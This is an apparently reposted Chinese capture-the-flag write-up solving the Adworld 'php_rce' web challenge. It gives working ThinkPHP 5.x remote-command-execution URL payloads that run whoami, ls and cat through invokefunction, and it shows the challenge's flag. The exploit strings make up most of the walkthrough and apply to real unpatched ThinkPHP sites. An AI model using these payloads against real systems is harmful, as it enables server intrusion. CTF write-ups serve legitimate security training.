2025年攻防世界-web篇(php_rce)详解

攻防世界-web篇(php_rce)详解每日一题 今天我们来攻防世界 web 篇 php rce 目录 1 利用 system 函数远程命令执行 2 查找文件目录 3 进入 flag 目录 4 查看 flag 文件拿到 flag 首先打开题目 这里我们可以看到打开后是一个 ThinkPHP V5 的界面

大家好,我是讯享网,很高兴认识大家。

每日一题,今天我们来攻防世界web篇(php_rce)

目录

1、利用system函数远程命令执行

2、查找文件目录

3、进入flag目录

4、查看flag文件拿到flag


首先打开题目:


讯享网

 这里我们可以看到打开后是一个ThinkPHP V5的界面,由此我们可以判断这是一个使用TinkPHP框架开发的,接下来我们由长期的渗透经验可以想多去网上找相关的漏洞来复现

这里时使用了ThinkPHP 5.x 远程命令执行漏洞

1、利用system函数远程命令执行

构造payload

index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami

讯享网

2、查找文件目录

构造payload

讯享网index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls /

 可以看到有很多目录我要找flag接下就这就进flag去

3、进入flag目录

构造payload

index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls /flag

 有两个flag文件这里我们直接使用 cat 命令来打开文件

4、查看flag文件拿到flag

构造payload

讯享网index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cat /flag

flag{thinkphp5_rce} 

小讯
上一篇 2025-03-03 12:00
下一篇 2025-01-16 15:17

相关推荐

版权声明:本文内容由互联网用户自发贡献,该文观点仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容,请联系我们,一经查实,本站将立刻删除。
如需转载请保留出处:https://51itzy.com/kjqy/34086.html